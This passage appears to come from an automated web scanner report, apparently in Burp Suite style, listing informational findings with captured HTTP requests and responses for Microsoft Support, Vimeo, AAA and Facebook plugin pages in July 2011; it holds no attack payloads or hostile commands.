</script><meta name="robots" content="none" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="content-language" content="en-US"><script type="text/javascript" src="/library/JavaScript/support/CN/ad.js"></script><script type="text/javascript" src="/common/script/gsfx/search.js?43"></script><script type="text/javascript" src="http://autocomplete.support.microsoft.com/script/ac.js?43"></script><script type="text/javascript">var gCookieDomain='';var url_exactMatch='/select/Default.aspx?target=assistance';</script><title>Agreement for Microsoft Services</title><XMLREADER><link rel="stylesheet" type="text/css" href="/common/css/default/default.css?43" /><link rel="stylesheet" type="text/css" href="/common/css/default/branding.css?43" /></XMLREADER>


<style type="text/css">html body, html select, html input, html form, html textarea{font-family : Verdana, Arial, Helvetica, Sans-Serif;}</style><script type="text/javascript">var PersonalizationInfo='Z3Blbi11cwhjc2EIQWdyZWVtZW50IGZvciBNaWNyb3NvZnQgU2U_';</script><script type="text/javascript" src="/common/script/fx/surveycookieutil.js?43"></script></head><body onload="thisLoad();" onunload="thisUnload();">
<style type="text/css">
body
{

background:url('/library/images/support/cn/parent_bkgnd.png') repeat-x #FFFFFF;

}

#gsfx_brnd_PageHeaderImage
{
background:url('/library/images/support/cn/mso_energy.jpg') no-repeat top center;
}

#gsfx_brnd_SiteHeaderImage
{
height:0px;
}

.gsfx_brnd_NetworkLink, .gsfx_brnd_NetworkLink:visited, .gsfx_brnd_NetworkLink a, .gsfx_brnd_NetworkLink a:visited
{
color: #FFFFFF;
}

.gsfx_brnd_NetworkLink:hover, .gsfx_brnd_NetworkLink:active, .gsfx_brnd_NetworkLink:focus,
.gsf
...[SNIP]...

Request 2

GET /gp/csa HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; sdninc=6; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; wedcsinc=3; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; .ASPXANONYMOUS=VT3Vw7p8zAEkAAAAMmI2MjhmMGQtZjljMC00ZjVjLWI3NTQtYzI1YjhjYjRkODFmgfpg6oo1Tx6e5ghYq_tHKKDqu1A1; fmshb=0,1311089497349

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=kcqX-rt8zAEkAAAAMzgyZTkwNTMtZjFhMS00Y2I4LTg2NWQtZDYyMTg0YmUxYjVl_QNiaPfk2qm0m5GpJNryNe8Bs9M1; expires=Tue, 27-Sep-2011 02:20:09 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:40:08 GMT
Content-Length: 45631

<html lang="en-US"><head><link title="Microsoft Support Search" type="application/opensearchdescription+xml" rel="search" href="/common/opensearchdescriptor.aspx?ln=en-us" /><meta name="ms.gsfxversion
...[SNIP]...
<script type="text/javascript">setcookieval("gssSITE","gn",'',true);</script><script type="text/javascript">setcookieval("gssTHEME","gn",'',true);</script><script type="text/javascript">setcookieval("gssTOOLBAR","gn",'',true);</script><meta name="robots" content="none" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="content-language" content="en-US"><script type="text/javascript" src="/library/JavaScript/support/CN/ad.js"></script><script type="text/javascript" src="/common/script/gsfx/search.js?43"></script><script type="text/javascript" src="http://autocomplete.support.microsoft.com/script/ac.js?43"></script><script type="text/javascript">var gCookieDomain='';var url_exactMatch='/select/Default.aspx?target=assistance';</script><title>Agreement for Microsoft Services</title><XMLREADER><link rel="stylesheet" type="text/css" href="/common/css/default/default.css?43" /><link rel="stylesheet" type="text/css" href="/common/css/default/branding.css?43" /></XMLREADER>


<style type="text/css">html body, html select, html input, html form, html textarea{font-family : Verdana, Arial, Helvetica, Sans-Serif;}</style><script type="text/javascript">var PersonalizationInfo='Z3Blbi11cwhjc2EIQWdyZWVtZW50IGZvciBNaWNyb3NvZnQgU2U_';</script><script type="text/javascript" src="/common/script/fx/surveycookieutil.js?43"></script></head><body onload="thisLoad();" onunload="thisUnload();">
<style type="text/css">
body
{

background:url('/library/images/support/cn/parent_bkgnd.png') repeat-x #FFFFFF;

}

#gsfx_brnd_PageHeaderImage
{
background:url('/library/images/support/cn/mso_energy.jpg') no-repeat top center;
}

#gsfx_brnd_SiteHeaderImage
{
height:0px;
}

.gsfx_brnd_NetworkLink, .gsfx_brn
...[SNIP]...

18.7. http://vimeo.com/moogaloop.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://vimeo.com
Path:	/moogaloop.swf

Request 1

GET /moogaloop.swf?clip_id=9957644&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.67
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.20/moogaloop.swf._root........<.......<.......<.......<...... ....A.@...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:21 GMT
X-Server: 10.90.128.73
Vary: Accept-Encoding
Content-Length: 245
Connection: close
Content-Type: application/x-shockwave-flash

FWS.....p...........?........
..embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.20/moogaloop.swf._root........<.......<.......<.......<...... ....A.@...

18.8. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.aaa.com
Path:	/scripts/WebObjects.dll/ZipCode.woa/wa/route

Request 1

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response 1

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:04:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:22 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:22 GMT; path=/; domain=aaa.com
content-length: 1280

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com">

<TITLE>www.aaa.com redirect</TITLE>
</HEAD>
<BODY>
<BR>
<BR>
<A HREF="http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com">If this page does not refresh click here.</A>


       




   

   
<SCRIPT LANGUAGE="JavaScript1.1" SRC="/configuration/dcs_tag.js">
   </SCRIPT>
   <SCRIPT LANGUAGE="JavaScript1.1">
       
   </SCRIPT>



   

   
<script type="text/javascript" src="/configuration/SEM/AAA_ActionTags.js"></script>





   <SCRIPT>
   
   </SCRIPT>

</BODY>
</HTML>

Request 2

Response 2

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:04:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW3
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:52 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:52 GMT; path=/; domain=aaa.com
content-length: 1220

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672">

<TITLE>www.aaa.com redirect</TITLE>
</HEAD>
<BODY>
<BR>
<BR>
<A HREF="http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672">If this page does not refresh click here.</A>


       




   

   
<SCRIPT LANGUAGE="JavaScript1.1" SRC="/configuration/dcs_tag.js">
   </SCRIPT>
   <SCRIPT LANGUAGE="JavaScript1.1">
       
   </SCRIPT>



   

   
<script type="text/javascript" src="/configuration/SEM/AAA_ActionTags.js"></script>





   <SCRIPT>
   
   </SCRIPT>

</BODY>
</HTML>

18.9. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Request 1

GET /plugins/activity.php?site=www.boston.com&width=311&height=300&header=false&colorscheme=light&font&border_color=white&ref=homepage HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.147.40
X-Cnection: close
Date: Tue, 19 Jul 2011 20:42:24 GMT
Content-Length: 8776

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="pbsH";</scri
...[SNIP]...
<div id="u814453_1" class="fbConnectWidgetTopmost" style="height:298px; width:309px; border-color:white;"><div style="overflow: hidden;height:275px; "><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="boston.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://boston.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u814453_3"><input value="Sign Up" type="submit" id="u814453_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u814453_1").login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u814453_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"></div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" width="32" height="32" /></div></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1" aria-hidden="true"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a><div class="UIImageBlock_Content UIImageBlock_ICON_Content"><div class="fss fwn fcg"><span><a class="uiLinkSubtle" tar
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.169.27
X-Cnection: close
Date: Tue, 19 Jul 2011 20:43:30 GMT
Content-Length: 8701

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="HHMW";</scri
...[SNIP]...
<div id="u821069_1" class="fbConnectWidgetTopmost" style="height:298px; width:309px; border-color:white;"><div style="overflow: hidden;height:275px; "><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u821070_3"><input value="Sign Up" type="submit" id="u821070_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u821069_1").login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u821069_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"></div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" width="32" height="32" /></div></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1" aria-hidden="true"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a><div class="UIImageBlock_Content UIImageBlock_ICON_Content"><div class="fss fwn fcg"><span><a class="uiLinkSubtle" target="_blank" href="http://developers.facebook.com/plugins/?footer=3">Facebo
...[SNIP]...

18.10. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.25
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:22 GMT
Content-Length: 6328

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...
<div id="connect_widget_4e259396c4bc26e08962968" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today's picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 640 others like this.</span><span class="connect_widget_not_connected_text">640 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=bing.com&placement=like_button&extra_1=http%3A%2F%2Fwww.bing.com%2F&extra_2=US" target="_blank">Sign Up</a> to see
...[SNIP]...

Request 2

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.190.52
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:36 GMT
Content-Length: 6257

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...
<div id="connect_widget_4e2593a4c51cd6e34902522" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today's picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 641 others like this.</span><span class="connect_widget_not_connected_text">641 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_
...[SNIP]...

18.11. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/News.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.255.43
X-Cnection: close
Date: Tue, 19 Jul 2011 16:03:43 GMT
Content-Length: 10298

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="styleshe
...[SNIP]...
<input name="partner_id" value="fastteks.com" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_1" value="http://www.fastteks.com/TechSolutions/News.aspx" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u142366_2"><input value="Sign Up" type="submit" id="u142366_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u142366_1").login();"><b>log in</b></a> to see what your friends like.</div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/fastteksRI" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/277119_115365331864877_4380483_q.jpg" alt="Fast-teks TechSolutions" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/fastteksRI" target="_blank"><span class="name">Fast-teks TechSolutions</span></a></div><div><div id="connect_widget_4e25aadfa18bb0124286845" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="
...[SNIP]...

Request 2

